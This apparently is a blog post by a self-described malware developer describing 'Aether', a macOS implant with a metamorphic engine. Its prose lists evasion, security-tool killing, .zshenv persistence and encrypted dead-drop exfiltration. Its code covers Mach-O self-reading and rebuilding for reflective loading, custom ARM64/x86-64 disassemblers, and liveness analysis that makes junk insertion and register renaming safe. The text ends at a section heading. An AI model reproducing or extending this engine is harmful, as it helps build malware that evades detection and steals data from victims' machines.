Today’s post we’re just raw-dogging it from a degenerate malware dev perspective. We’re gonna cook up a self-contained metamorphic engine a piece carrying its own ARM64 disassembler, liveness analyzer, code generator, and multiple mutation algorithms, with reflective loading, collection & exfiltration capabilities.

Is this worth it in ’26? Probably not. Do I think it’s cool? Hell yeah.

Had some free time this weekend, so I figured why not finally write about a piece of code I’ve had sitting around for a while called Aether. You can find it at:

Most of it is written for x86, with a bit of ARM sprinkled in, but the ARM side is pretty half-baked and definitely not finished. Why? Partly because x86 is where most of my time went, and partly because I never fully committed to finishing the ARM implementation.

So I figured this is actually a good excuse to flip that around build a proper ARM version, learn more about the architecture in the process, and clean up some of the rough edges.

As of writing this, it’s been tested on macOS(26.2),

What we’re talking about here is a macOS implant designed to infiltrate a target machine and exfiltrate data from it. Nothing groundbreaking, nothing magical just messing around and exploring how things work.

On macOS, the implementation leans heavily on the Mach‑O executable format. Instead of treating it like a black box, we manipulate the structure directly parsing and modifying the binary so the code can transform itself while still remaining valid and executable.

The metamorphic core runs an N-generation mutation cycle with embedded ARM64/x86-64 disassemblers and liveness analyzer. Junk insertion, equivalent substitution, and block reordering transform the code each execution. Each generation gets encrypted with AES key chaining and reflectively loaded in-memory without touching disk.

Metamorphic basically means a program that rewrites its own body while keeping the same behavior, for a textbook explanation, Wikipedia got you: Metamorphic code - Wikipedia

The engine validates its environment before execution, checking domain, network, and hardware UUID. If the environment doesn’t match, it self-destructs immediately. The anti-analysis layer handles debugger detection and scans for macOS security tools using encrypted process-name hashes. LaunchDaemon-backed tools are suspended with SIGSTOP, while other processes are terminated with SIGTERM or SIGKILL. Stack-built strings prevent static extraction, and aggressive memory wiping covers traces.

Persistence uses .zshenv hooks and phased execution dormant period, profiling, then exfiltration. The exfiltration mech we use a dead-drop C2 architecture with RSA+AES encryption, collects files via Spotlight, and with exponential backoff to minimize detection.

how you build it ?

Mach-O

Everything we do in this engine revolves around Mach-O. It’s the executable format on macOS the container that holds your code, your data, your symbols, everything the kernel and dyld need to map a binary into memory and run it. If you want to mutate code at runtime, rewrite yourself to disk, or reflectively load a new image without touching dyld, you need to understand this format at the byte level.

Apple documents the structures in <mach-o/loader.h>. That header is your spot. Every struct we reference lives there, and the kernel source (xnu/bsd/kern/mach_loader.c) shows exactly how the loader validates and maps these structures. Worth reading if you want to know what you can get away with.

A Mach-O binary is laid out sequentially header, load commands, then raw data. No index tables, no indirection. You walk it linearly.

┌──────────────────────┐  offset 0
│  mach_header_64      │  32 bytes
├──────────────────────┤
│  load command 0      │  variable size
│  load command 1      │
│  ...                 │
│  load command N      │
├──────────────────────┤  page-aligned boundary
│  __TEXT segment data │  (code lives here)
├──────────────────────┤
│  __DATA segment data │
├──────────────────────┤
│  __LINKEDIT          │  (symbols, strings, fixups)
└──────────────────────┘

The header tells you how many load commands follow and their total size. Each load command describes a segment, and segments contain sections.

struct mach_header_64 is 32 bytes. The fields that matter to us:

struct mach_header_64 {
    uint32_t magic;       // MH_MAGIC_64 = 0xFEEDFACF
    cpu_type_t cputype;   // CPU_TYPE_ARM64 or CPU_TYPE_X86_64
    cpu_subtype_t cpusubtype;
    uint32_t filetype;    // MH_EXECUTE, MH_DYLIB, MH_BUNDLE
    uint32_t ncmds;       // number of load commands
    uint32_t sizeofcmds;  // total size of all load commands
    uint32_t flags;       // MH_PIE, MH_NOUNDEFS, etc.
    uint32_t reserved;
};

magic is your first sanity check. 0xFEEDFACF means 64-bit native endian. 0xCFFAEDFE means byte-swapped. If you see 0xFEEDFACE that’s 32-bit and you’re in the wrong decade. In the dropper we validate this immediately after decryption to confirm we got a valid binary out

uint32_t magic = *(uint32_t *)decrypted;
if (magic != 0xfeedfacf && magic != 0xcffaedfe) {
    memset(decrypted, 0, dec_len);
    free(decrypted);
    return 1;
}

filetype matters when you’re constructing Mach-Os from scratch. MH_EXECUTE is a standalone binary. MH_DYLIB is a shared library. MH_BUNDLE is a loadable plugin (what dlopen expects). We use MH_DYLIB when wrapping mutated code because it gives us the most flexibility with reflective loading.

flags control linker and loader behavior. MH_PIE enables ASLR. MH_NOUNDEFS tells dyld there are no undefined symbols. MH_DYLDLINK marks it as dynamically linked. We set all three when constructing our wrapper:

mh->flags = MH_NOUNDEFS | MH_DYLDLINK | MH_PIE;

Alright then how we load commands ? that’s a good question homie, every command starts with the same two fields:

struct load_command {
    uint32_t cmd;      // command type (LC_SEGMENT_64, LC_MAIN, ..)
    uint32_t cmdsize;  // total size of this command including any trailing data
};

You walk them by advancing cmdsize bytes each iteration. The kernel does the same thing There’s no random access you iterate linearly:

uint8_t *ptr = data + sizeof(struct mach_header_64);

for (uint32_t i = 0; i < mh->ncmds; i++) {
    struct load_command *lc = (struct load_command *)ptr;

    if (lc->cmd == LC_SEGMENT_64) {
        struct segment_command_64 *seg = (struct segment_command_64 *)ptr;
        // handle segment
    }

    ptr += lc->cmdsize;
}

The commands we care about:

LC_SEGMENT_64 describes a memory region. Every segment has a virtual address, virtual size, file offset, file size, and protection flags. The kernel maps filesize bytes from fileoff to vmaddr, then zero-fills up to vmsize. This is how BSS works vmsize > filesize and the difference is zeroed.

LC_MAIN gives us the entry point as an offset from __TEXT. Older binaries use LC_UNIXTHREAD instead, which embeds a full thread state struct with the instruction pointer set.

LC_SYMTAB and LC_DYSYMTAB point to symbol tables in __LINKEDIT. We need these when constructing valid Mach-Os for reflective loading dyld validates their presence even if they’re empty.

LC_SEGMENT_64 is followed by zero or more section_64 structs, packed inline. The segment’s nsects field tells you how many:

struct segment_command_64 *seg = (struct segment_command_64 *)ptr;
struct section_64 *sections = (struct section_64 *)(seg + 1);

for (uint32_t j = 0; j < seg->nsects; j++) {
    // sections[j].sectname  - e.g. "__text", "__stubs", "__cstring"
    // sections[j].segname   - parent segment name
    // sections[j].addr      - virtual address
    // sections[j].size      - size in bytes
    // sections[j].offset    - file offset to raw data
}

The standard layout has 3 segments:

__PAGEZERO is a zero-length mapping at address 0 that catches NULL pointer dereferences. vmsize is typically one page (0x4000 on ARM64), filesize is 0. No actual data.

__TEXT contains executable code and read-only data. Protection is r-x. Inside it, __text holds the actual machine code, __stubs and __stub_helper handle lazy binding, __cstring holds C string literals. The __text section is what we extract, disassemble, mutate, and write back.

__DATA contains writable data globals, static variables, Objective-C metadata. Protection is rw-.

__LINKEDIT holds symbol tables, string tables, code signatures, and fixup chains. No sections inside it just raw data referenced by other load commands.

and this is the core operation. Every time we need to mutate code, we walk the load commands looking for __TEXT.__text:

static struct section_64 *find_text(uint8_t *data) {
    struct mach_header_64 *mh = (void *)data;
    if (mh->magic != MH_MAGIC_64) return NULL;
    uint8_t *p = data + sizeof(*mh);
    for (uint32_t i = 0; i < mh->ncmds; i++) {
        struct load_command *lc = (void *)p;
        if (lc->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *seg = (void *)p;
            if (!strcmp(seg->segname, "__TEXT")) {
                struct section_64 *s = (void *)(p + sizeof(*seg));
                for (uint32_t j = 0; j < seg->nsects; j++)
                    if (!strcmp(s[j].sectname, "__text")) return &s[j];
            }
        }
        p += lc->cmdsize;
    }
    return NULL;
}

Once you have the section, the code bytes are at data + section->offset, and section->size tells you how many bytes. On ARM64 every instruction is 4 bytes, so size / 4 gives you the instruction count. On x86-64 instructions are variable-length, which is a whole different problem.

Reading Your Own Binary

Self-modification starts with play with yourself [PAUSE!] _NSGetExecutablePath() from <mach-o/dyld.h> gives you the path to the running binary:

char path[1024];
uint32_t size = sizeof(path);
_NSGetExecutablePath(path, &size);

FILE *f = fopen(path, "rb");
fseek(f, 0, SEEK_END);
size_t len = ftell(f);
fseek(f, 0, SEEK_SET);

uint8_t *self = malloc(len);
fread(self, 1, len, f);
fclose(f);

Now self is a byte-for-byte copy of your own Mach-O in heap memory. Parse it, find __text, hand the code bytes to the disassembler, mutate, and you’re in business.

Constructing Mach-Os from Scratch

After mutation, we need to wrap the transformed code in a valid Mach-O for reflective loading. This means building the entire structure by hand header, segments, sections, symbol tables. The wrapper constructs a minimal dylib:

uint8_t *wrap_macho(const uint8_t *code, size_t code_sz, size_t *out_sz) {
    // header + load commands | __text code | __LINKEDIT
    // Everything page-aligned (0x4000 on ARM64)

    size_t code_off = PG_ALIGN(header_size);
    size_t code_aln = PG_ALIGN(code_sz);
    size_t link_off = code_off + code_aln;
    size_t total    = link_off + PG;

    uint8_t *buf = calloc(1, total);
    // ... fill in header, segments, sections, symtab ...
    memcpy(buf + code_off, code, code_sz);
    return buf;
}

Page alignment is critical so for ARM64 macOS uses 16KB pages (0x4000), not 4KB like x86-64. Get this wrong and the kernel refuses to map your binary. The PG_ALIGN macro rounds up:

#define PG 0x4000
#define PG_ALIGN(x) (((x) + PG - 1) & ~(PG - 1))

The constructed Mach-O needs __PAGEZERO, __TEXT with a __text section, __LINKEDIT with at least empty symtab/strtab, and LC_SYMTAB/LC_DYSYMTAB commands pointing into it.

Skip any of these and dyld or the kernel will reject the image. We also include LC_DYLD_INFO_ONLY with zeroed fields dyld checks for its presence even if there are no actual fixups.

So simply put the mutation engine doesn’t operate on abstract code. It operates on real Mach-O binaries. Every generation reads a Mach-O, extracts __text, transforms the instructions, wraps the result in a new Mach-O, and reflectively loads it. The format is the interface between mutation and execution. Get the parsing wrong and you c0rrupt code. Get the construction wrong and the loader rejects it. Get the alignment wrong and the kernel panics your process.

either way it’s a bitch

The original Apple documentation. Archived because Apple pulled it, but it’s still the most complete reference for the structures in mach-o/loader.h.

Disassembly

Before you can mutate code, you need to understand it. Not at the source level that’s long gone by the time you’re looking at a compiled binary. You need to understand it at the instruction level so what each 4 byte word or variable-length byte sequence actually does, which registers it reads, which it writes, whether it touches flags, whether it branches. Without this, mutation is just corruption.

We built our own disassemblers for both architectures. No Capstone, no Zydis, no external dependencies. The engine needs to be self-contained a single binary carrying everything it needs to understand and rewrite itself. External libraries mean more symbols to resolve, more surface for static analysis, and more things that can break during reflective loading. Rolling your own also means you decode exactly what the mutation engine needs and nothing more.

ARM64

ARM64 is the easier target. Every instruction is exactly 4 bytes, aligned on a 4-byte boundary. No var length encoding, no prefix bytes and no ambiguity about where one instruction ends and the next begins. The ARM Architecture Reference Manual documents the encoding in sections C4 through C6 all bout bit-level specification.

You don’t need all of it. The mutation engine cares about data processing, loads/stores, branches, and system instructions so SIMD/FP we treat as opaque blobs if you don’t get non one of this google is your homie then come back

The decoder reads a 32-bit word and pattern-matches against encoding groups. ARM64 uses a top down bit classification the upper bits identify the instruction class, lower bits encode operands. The bits() extracts arbitrary bit ranges:

static inline uint32_t bits(uint32_t x, int hi, int lo) {
    return (x >> lo) & ((1u << (hi - lo + 1)) - 1u);
}

Every instruction decodes into an arm64_inst_t struct that captures everything the mutation engine needs:

typedef struct {
    uint32_t raw;
    arm_op_t op;
    uint8_t rd, rn, rm, ra;
    int64_t imm;
    int64_t target;
    bool is_64bit;
    bool sets_flags;
    bool reads_flags;
    bool valid;
    bool is_control_flow;
    addr_mode_t addr_mode;
    uint8_t regs_read[4];
    uint8_t regs_written[2];
    uint8_t num_regs_read;
    uint8_t num_regs_written;
} arm64_inst_t;

The register tracking arrays are the imprt part. regs_read and regs_written feed directly into liveness analysis. Every decode path must populate these correctly or the mutation engine will clobber live registers and crash the binary.

Decoding starts with branches since they’re the most important for control flow analysis.

A B or BL instruction matches when bits [31:26] are 000101:

/* B / BL */
if ((w & 0x7C000000) == 0x14000000) {
    bool link = (w >> 31) & 1;
    int64_t off = sxt(bits(w, 25, 0), 26) << 2;
    out->op = link ? ARM_OP_BL : ARM_OP_B;
    out->target = off;
    out->is_control_flow = true;
    if (link) wr_track(out, 30);  // BL writes X30 (link register)
    return true;
}

Then sign-extends the 26-bit immediate to 64 bits. The « 2 accounts for the fact that ARM64 branch offsets are in units of 4 bytes (instruction-aligned). BL additionally writes X30 (the link register) miss this and liveness analysis thinks X30 is dead after a function call, which it isn’t.

Conditional branches (B.cond, CBZ, CBNZ, TBZ, TBNZ) each have their own encoding. B.cond reads flags (NZCV), CBZ/CBNZ read a register and compare against zero, TBZ/TBNZ test a specific bit. The decoder marks reads_flags for B.cond so the mutation engine knows not to insert flag-clobbering junk before it:

/* B.cond */
if ((w & 0xFF000010) == 0x54000000) {
    out->op = ARM_OP_B_COND;
    out->target = sxt(bits(w, 23, 5), 19) << 2;
    out->cond = (arm_cond_t)(w & 0xF);
    out->reads_flags = true;
    out->is_control_flow = true;
    return true;
}

Data processing instructions are where the encoding gets dense. ADD/SUB immediate, ADD/SUB shifted register, logical shifted register, logical immediate each has its own bit pattern. The decoder handles aliases: CMP is SUBS with Rd=XZR, MOV is ORR Rd, XZR, Rm, TST is ANDS XZR, Rn, Rm

These aliases matter because the mutation engine needs to know the semantic operation, not just the raw encoding. When we substitute MOV X1, X2 with an equivalent, we need to know it’s a move, not an OR with zero:

/* MOV reg alias: ORR Xd, XZR, Xm */
if (opc == 1 && !N && out->rn == 31 && out->shift_type == 0 && out->shift_amount == 0) {
    out->op = ARM_OP_MOV_REG;
    rd_track(out, out->rm);
    wr_track(out, out->rd);
    return true;
}

Logical immediates use ARM64’s bitmask encoding one of the more painful parts of the ISA. A logical immediate isn’t stored as a plain value It’s actually encoded as three fields: N, immr, imms, which together describe a repeating bit pattern.

-bit mask from these fields. The ARM ARM describes this in section C3.4.4. The algorithm finds the element size from the highest set bit of N:NOT(imms), constructs a base pattern, rotates it, then replicates it across 64 bits. Getting this wrong means your equivalent substitutions produce different values.

Also

Load/store decoding tracks addressing modes because they affect register liveness. A pre-index [Xn, #imm]! writes back to the base register both a read and a write. A post-index [Xn], #imm does the same. Plain offset [Xn, #imm] only reads the base. The rn_is_sp flag marks instructions where register 31 means SP rather than XZR (most load/store instructions use SP, most data processing uses XZR). This distinction matters for stack frame analysis.

Load/store pairs (LDP/STP) transfer two registers at once. The decoder tracks both Rd and Ra (the second register, encoded in the Rt2 field). For stores, both are reads. For loads, both are writes. Miss the second register and liveness analysis has a blind spot.

System instructions (SVC, MRS, MSR, NOP, barriers) and PAC instructions (PACIASP, AUTIASP, RETAA) get decoded but marked is_privileged. The mutation engine won’t touch these reordering a PACIASP relative to its matching AUTIASP breaks pointer authentication and crashes the process.

SIMD/FP instructions we recognize but don’t decode internally. They get tagged as ARM_OP_SIMD and treated as opaque barriers. The mutation engine won’t insert junk between SIMD sequences or reorder them. This is conservative but alright for decoding the full NEON/SVE instruction set would double the disassembler size for minimal mutation benefit.

x86-64

I’ll keep this one short but x86-64 is a different beast entirely. Variable-length instructions from 1 to 15 bytes. Legacy prefixes, REX prefixes, VEX prefixes, ModR/M bytes, SIB bytes, displacements, immediates all optional, all context-dependent. See “The Intel Software Developer’s Manual (SDM) Volume 2”

The decoder is a single-pass state machine. It walks the byte stream consuming prefixes, then the opcode, then ModR/M, then SIB, then displacement, then immediate Each stage determines whether the next stage exists:

[prefixes] [REX] [opcode 1-3 bytes] [ModR/M] [SIB] [disp 1/2/4] [imm 1/2/4/8]

Prefixes come first. Legacy prefixes (0x66 operand size, 0xF0 LOCK, 0xF2/0xF3 REP, segment overrides) can appear in any order. REX prefixes (0x40-0x4F) extend register encoding from 3 bits to 4 bits, giving access to R8-R15. The decoder consumes these in a loop:

while (p < end && out->prefix_count < 4) {
    uint8_t b = *p;
    if ((b & 0xF0) == 0x40) {  /* REX */
        rex_w = (b >> 3) & 1;  // 64-bit operand size
        rex_r = (b >> 2) & 1;  // extends ModR/M reg field
        rex_x = (b >> 1) & 1;  // extends SIB index field
        rex_b = b & 1;         // extends ModR/M rm or SIB base
        p++; continue;
    }
    if (!is_prefix(b)) break;
    p++; out->prefix_count++;
}

VEX and EVEX prefixes (used by AVX/AVX-512) we skip entirely. If we see 0xC4, 0xC5, or 0x62, we mark the instruction as SIMD and consume the rest as opaque. Same reasoning as ARM64 not worth decoding for mutation purposes.

The opcode is 1, 2, or 3 bytes. Single-byte opcodes cover most common instructions. Two-byte opcodes start with 0x0F (the escape byte). Three-byte opcodes start with 0x0F 0x38 or 0x0F 0x3A. The needs_modrm() function determines whether a ModR/M byte follows this is a lookup against the opcode tables in the SDM.

ModR/M is where x86 encoding gets interesting. It’s a single byte with three fields: mod (2 bits), reg (3 bits), rm (3 bits). mod=3 means register-to-register. mod=0/1/2 means memory operand with 0/1/4 bytes of displacement. When rm=4, a SIB byte follows for scaled-index addressing ([base + index*scale + disp]). When mod=0 and rm=5, it’s RIP-relative addressing critical for position-independent code on x86-64.

The SIB byte adds another layer scale (2 bits), index (3 bits), base (3 bits). Index register 4 (RSP) means “no index”. Base register 5 with mod=0 means “no base, disp32 only”. These special cases are documented in SDM Table 2-3. Get them wrong and your displacement calculations are off, which means your branch target resolution is wrong, which means your control flow analysis is wrong, which means your fucked up

REX bits extend the 3-bit register fields to 4 bits. REX.R extends ModR/M.reg, REX.B extends ModR/M.rm and SIB.base, REX.X extends SIB.index. This is how x86-64 accesses R8-R15:

out->reg = reg3 | (rex_r ? 8 : 0);
uint8_t base_reg = rm3 | (rex_b ? 8 : 0);

After raw decoding, we runs a second pass to determine the semantic operation and populate register tracking. This is separated from decoding because x86 uses the same opcode bytes for different operations depending on the ModR/M extension field (/r). Opcode 0xF7 with /r=3 is NEG, with /r=4 is MUL, with /r=6 is DIV. The classifier handles all of these:

if (op0 == 0xF7) {
    switch (ext) {
        case 0: inst->op = X86_OP_TEST; inst->sets_flags = true; ...
        case 2: inst->op = X86_OP_NOT; ...
        case 3: inst->op = X86_OP_NEG; inst->sets_flags = true; ...
        case 4: inst->op = X86_OP_MUL; inst->sets_flags = true; ...
        case 6: inst->op = X86_OP_DIV; ...
    }
}

Register tracking on x86 is more bitch than ARM64 because of implicit operands. MUL implicitly reads RAX and writes RAX:RDX. DIV reads RDX:RAX and writes RAX and RDX. PUSH reads RSP and writes RSP. CALL reads RSP, writes RSP, and (per the System V ABI) clobbers all volatile registers. The classifier encodes the System V calling convention directly:

static const bool x86_volatile[16] = {
    true,  /* rax */ true,  /* rcx */ true,  /* rdx */ false, /* rbx */
    false, /* rsp */ false, /* rbp */ true,  /* rsi */ true,  /* rdi */
    true,  /* r8  */ true,  /* r9  */ true,  /* r10 */ true,  /* r11 */
    false, /* r12 */ false, /* r13 */ false, /* r14 */ false, /* r15 */
};

This table drives liveness analysis across function calls. After a CALL, all volatile registers are assumed clobbered (dead). Non-volatile registers (RBX, RBP, R12-R15) are preserved by the callee and remain live.

The two architectures share nothing at the encoding level. ARM64 is clean and regular fixed-width, consistent field positions, orthogonal register encoding. x86-64 is a 40-year accumulation of extensions bolted onto an 8-bit microprocessor ISA.

The ModR/M/SIB/REX machinery alone is more complex than the entire ARM64 encoding scheme. Building a disassembler for both means solving two fundamentally different problems.

Liveness Analysis

You can’t just shove instructions into a binary and hope for the best. Every register in a running program is either carrying a value that matters something a later instruction will read or it’s dead, holding garbage nobody cares about. Insert a MOV X3, #0x42 at the wrong point and you’ve just destroyed a function argument, a loop counter, or a pointer that was about to be dereferenced. The piece crashes, or produces wrong shit silently.

Liveness analysis tells us which registers are cool to clobber at every point in the code. It’s the difference between a metamorphic engine that produces working binaries and one thatproduces shit.

So consider this ARM64 sequence a simple function body:

 MOV   X0, X1          ; X0 = X1
 ADD   X2, X0, #8      ; X2 = X0 + 8
 LDR   X3, [X2]        ; X3 = mem[X2]
 MUL   X4, X3, X0      ; X4 = X3 * X0
 STR   X4, [X2, #16]   ; mem[X2+16] = X4
 ADD   X5, X4, X3      ; X5 = X4 + X3
 SUB   X6, X5, #1      ; X6 = X5 - 1
 CMP   X6, #0          ; flags = compare(X6, 0)
 B.NE  <somewhere>      ; branch if not equal
 RET                    ; return X0

Say we want to insert junk between instructions 4 and 5. Which registers can we clobber?

Naively, you might look at instruction 4 and say “X4 was just written, it’s done.” nah Instruction 5 reads X4. Clobber it and you’ve broken the computation.

You might think X0 is free since it was last written at instruction 0 and last read at instruction 3. But instruction 9 is RET, and the ARM64 calling convention returns values in X0. The value from instruction 0 flows all the way to the return. X0 is live across the entire sequence.

This is why you need dataflow analysis. Eyeballing doesn’t scale, and getting it wrong means a broken binary.

Every instruction has two properties that matter which registers it reads and which registers it writes. The disassembler already extracts these during decoding, but liveness analysis formalizes them into bitmasks

We get register sets as a uint32_t bitmask bits 0-30 for X0-X30, bit 31 for the NZCV flags:

typedef uint32_t regset_t;
#define REG_BIT(r)    (1u << (r))
#define FLAGS_BIT     (1u << 31)

Extracting use/def from a decoded instruction is mechanical

static void inst_usedef(const arm64_inst_t *inst, regset_t *use, regset_t *def) {
    *use = *def = 0;
    if (!inst->valid) {
        *use = *def = 0xFFFFFFFFu;  /* unknown = assume everything */
        return;
    }
    for (int i = 0; i < inst->num_regs_read; i++)
        *use |= REG_BIT(inst->regs_read[i]);
    for (int i = 0; i < inst->num_regs_written; i++)
        *def |= REG_BIT(inst->regs_written[i]);
    if (inst->reads_flags) *use |= FLAGS_BIT;
    if (inst->sets_flags)  *def |= FLAGS_BIT;
}

Unknown instructions get 0xFFFFFFFF for both use and def. This means “assume it reads and writes everything.” Conservative, but cool. An unknown instruction acts as a barrier the engine won’t insert junk around it.

This is the fundamental principle over-approximation preserves correctness, under approximation breaks programs.

Special cases matter too. BL (function call) doesn’t just branch it reads X0-X7 (arguments per the AAPCS64 calling convention), clobbers X0-X18 plus flags (caller-saved registers), and writes X30 (link register). RET implicitly reads X0 (return value) and X30. Miss any of these and

your liveness data is wrong.

if (inst->op == ARM_OP_BL || inst->op == ARM_OP_BLR) {
    *use |= 0x000000FFu;              /* X0-X7 */
    *def |= 0x0007FFFFu | FLAGS_BIT;  /* X0-X18 + flags */
}
if (inst->op == ARM_OP_RET || inst->op == ARM_OP_RETAA) {
    *use |= REG_BIT(0) | REG_BIT(30); /* return value + link register */
}

These rules come straight from the ARM Architecture Get this wrong and you’ll clobber a register that a called function was supposed to preserve, or destroy a return value.

this whole thin’ is a backward analysis. You start at the end of the code and work toward the beginning, propagating information about which registers are needed in the future.

The equation at each instruction is or some shit like this

$$\text{live\_in}[i] = \text{use}[i] \cup (\text{live\_out}[i] - \text{def}[i])$$

Meaning ? a register is live before instruction i if instruction i reads it (use), or if it’s live after instruction i and instruction i doesn’t write it (live_out minus def). If an instruction writes a register, it “kills” the previous value anything live after the instruction that was defined by it doesn’t need to be live before it.

live_out[i] is simply live_in[i+1] in straight-line code. At branches it’s the union of all successor blocks’ live_in sets.

void liveness_window(const arm64_inst_t *insns, int n,
                     inst_live_t *out, int win_start, int win_end) {
    for (int i = win_start; i <= win_end; i++)
        inst_usedef(&insns[i], &out[i].use, &out[i].def);

    regset_t live = 0xFFFFFFFFu; /* assume worst case past window */

    /* scan past window to refine */
    regset_t la_def = 0, la_use = 0;
    int la_limit = (win_end + 17 < n) ? win_end + 17 : n;
    for (int i = win_end + 1; i < la_limit; i++) {
        regset_t u, d;
        inst_usedef(&insns[i], &u, &d);
        la_use |= u & ~la_def;
        la_def |= d;
        if (insns[i].is_control_flow) break;
    }
    regset_t proven_dead = la_def & ~la_use;
    live &= ~proven_dead;

    for (int i = win_end; i >= win_start; i--) {
        out[i].live_out = live;
        live = out[i].use | (live & ~out[i].def);
        out[i].live_in = live;
    }
}

Notice the initialization: live = 0xFFFFFFFFu. Every register assumed live past the window boundary. This is deliberate over-approximation. We don’t know what code follows the mutation window, so we assume the worst everything is needed.

The look-ahead refines this. It scans up to 16 instructions past the window looking for registers that get written before being read. Those are provably dead at the window boundary, so we can remove them from the live set:

regset_t proven_dead = la_def & ~la_use;
live &= ~proven_dead;

This is the tension in the whole system. Conservative analysis is always correct you’ll never corrupt a live value but it leaves dead registers on the table. Every register you can’t prove dead is a mutation opportunity lost. The look-ahead buys back some of those opportunities without risking correctness.

Full-Function Analysis

Window mode works for local mutations, but block permutation needs global liveness across the entire function. That requires basic block splitting and fixed-point iteration:

int liveness_full(const arm64_inst_t *insns, int n, inst_live_t *out) {
    /* Find basic block boundaries */
    bool *is_leader = calloc(n, sizeof(bool));
    is_leader[0] = true;
    for (int i = 0; i < n; i++) {
        if (insns[i].is_control_flow) {
            if (i + 1 < n) is_leader[i + 1] = true;
            int tgt_idx = i + (int)(insns[i].target / 4);
            if (tgt_idx >= 0 && tgt_idx < n)
                is_leader[tgt_idx] = true;
        }
    }
    /* ... build block list ... */

    /* Iterate to fixed point */
    for (int iter = 0; iter < 1000; iter++) {
        bool changed = false;
        for (int b = nblocks - 1; b >= 0; b--) {
            /* Compute block live_out from successors' live_in */
            regset_t new_out = 0;
            /* Fallthrough successor */
            if (e + 1 < n && /* not unconditional branch */)
                new_out |= out[e + 1].live_in;
            /* Branch target successor */
            if (insns[e].is_control_flow && insns[e].target != 0) {
                int tgt = e + (int)(insns[e].target / 4);
                if (tgt >= 0 && tgt < n)
                    new_out |= out[tgt].live_in;
            }
            if (new_out != blk_live_out[b]) {
                blk_live_out[b] = new_out;
                changed = true;
            }
            /* Backward pass within block */
            regset_t live = blk_live_out[b];
            for (int i = e; i >= s; i--) {
                out[i].live_out = live;
                live = out[i].use | (live & ~out[i].def);
                out[i].live_in = live;
            }
        }
        if (!changed) break;
    }
}

A basic block is a maximal sequence of instructions with no branches in and no branches out except at the boundaries. Block leaders are instruction 0, any branch target, and any instruction following a branch. The algorithm splits the code at these points, then iterates the backward

pass across blocks until nothing changes. At branches, live_out is the union of all successors’ live_in conditional branches have two successors (target and fallthrough), unconditional branches have one, and RET has none (only return-convention registers: X0, FP, LR).

Convergence is guaranteed because the live sets can only grow (we’re computing a least fixed point over a monotone lattice), and the lattice is finite (32 bits). In practice it converges in 2 - 4 iterations for typical function sizes.

Not all dead registers are fair game. The ARM64 calling convention (AAPCS64) designates X19–X28 as callee-saved. A function must preserve their values across calls. Even if liveness analysis says X19 is dead within a window, clobbering it without saving/restoring violates the ABI and corrupts the caller’s state.

The engine excludes these unconditionally:

static inline regset_t dead_regs(const inst_live_t *live, int idx) {
    const regset_t CALLEE_SAVED = 0x1FF80000u; /* bits 19-28 */
    return ~live[idx].live_out & 0x1FFFFFFFu & ~CALLEE_SAVED;
}

That mask removes X19–X28, X29 (frame pointer), X30 (link register), and SP from the dead set regardless of what liveness says. Only X0–X18 are candidates for junk insertion the volatile registers that functions are allowed to trash.

Loop-Aware Analysis

Standard liveness misses a subtle case inside loops. A register might appear momentarily dead at one point in a loop body, but the loop iterates, and on the next iteration that register is live again. If you insert junk that clobbers it, the first iteration works fine but subsequent iterations read garbage.

The engine detects loops by scanning for backward branches any branch whose target is at or before itself:

int detect_loops(const arm64_inst_t *insns, int n, bool *loop_body) {
    for (int i = 0; i < n; i++) {
        if (!insns[i].is_control_flow || insns[i].target == 0) continue;
        if (insns[i].op == ARM_OP_BL || insns[i].op == ARM_OP_BLR) continue;
        int tgt = i + (int)(insns[i].target / 4);
        if (tgt > i) continue;  /* forward branch */
        for (int j = tgt; j <= i; j++)
            loop_body[j] = true;
    }
}

Instructions inside a loop body get their dead set further restricted. then we computes the union of all live_in and live_out sets across the entire loop. Any register that’s live anywhere in the loop is excluded from the dead set for every instruction in that loop:

regset_t loop_live_regs(const arm64_inst_t *insns, const inst_live_t *live,
                        int n, const bool *loop_body, int idx) {
    /* Find tightest enclosing loop */
    /* ... */
    regset_t all_live = 0;
    for (int i = best_lo; i <= best_hi; i++)
        all_live |= live[i].live_in | live[i].live_out;
    return all_live;
}

This is aggressive it kills a lot of mutation opportunities inside loops. But loops are where correctness bugs are hardest to find (they only manifest after N iterations), so the conservatism is cool with me for now.

Also functions spill values to the stack via STP/LDP pairs. If you insert a junk STR to a stack offset that holds a spilled callee-saved register, you’ve corrupted it just as surely as writing to the register directly.

We tracks SP-relative stores and loads as “stack slots” with their own parallel liveness analysis:

int stack_liveness(const arm64_inst_t *insns, int n, slot_live_t *out) {
    /* Discover SP-relative accesses, build slot table */
    for (int i = 0; i < n; i++) {
        int16_t off; uint8_t sz; bool store;
        if (!is_sp_access(&insns[i], &off, &sz, &store)) continue;
        int s = find_or_add_slot(slots, &num_slots, off, sz);
        if (store) out[i].def |= (1u << s);
        else       out[i].use |= (1u << s);
    }
    /* Backward dataflow on slot bitmasks */
    uint16_t live = 0;
    for (int i = n - 1; i >= 0; i--) {
        out[i].live_out = live;
        live = out[i].use | (live & ~out[i].def);
        out[i].live_in = live;
    }
}

Same backward dataflow, different domain. Instead of 32 register bits, it’s 16 stack slot bits. Before inserting any stack-touching junk smthg like

static inline bool slot_is_aight(const slot_live_t *slive, int idx,
                                int16_t offset, uint8_t size) {
    for (int s = 0; s < slive[0].num_slots; s++) {
        if (!(slive[idx].live_out & (1u << s))) continue;
        int16_t so = slive[0].slots[s].offset;
        uint8_t ss = slive[0].slots[s].size;
        if (offset < so + ss && so < offset + size)
            return false; /* overlaps a live slot */
    }
    return true;
}

Liveness tells you what’s dead. Def-use chains tell you what’s connected. A chain links a register definition (write) to all its consumers (reads) before the next redefinition. This is what makes register renaming safe.

If X3 is defined at instruction 5 and read at instructions 8 and 12, that’s one chain: def=5, uses=[8,12]. To rename X3 to X7 across this chain, the engine verifies X7 is dead at the def point and stays dead through all uses. If so, it patches the register field in all three instructions:

int rename_reg(uint8_t *code, int n, const inst_live_t *live,
               const def_use_t *chain, uint8_t new_reg) {
    regset_t bit = REG_BIT(new_reg);
    if (live[chain->def_idx].live_out & bit) return 0;
    for (int i = 0; i < chain->num_uses; i++) {
        if (live[chain->use_idx[i]].live_in & bit) return 0;
    }
    /* Safe - patch all occurrences */
    patch_reg(code, chain->def_idx, old_reg, new_reg);
    for (int i = 0; i < chain->num_uses; i++)
        patch_reg(code, chain->use_idx[i], old_reg, new_reg);
}

The chain builder handles branches by consulting liveness: if a register is live-out at a conditional branch, the value reaches some path beyond the branch, so the chain continues scanning the fallthrough. If it’s dead, the chain ends there.

How the Mutation Engine Uses All This

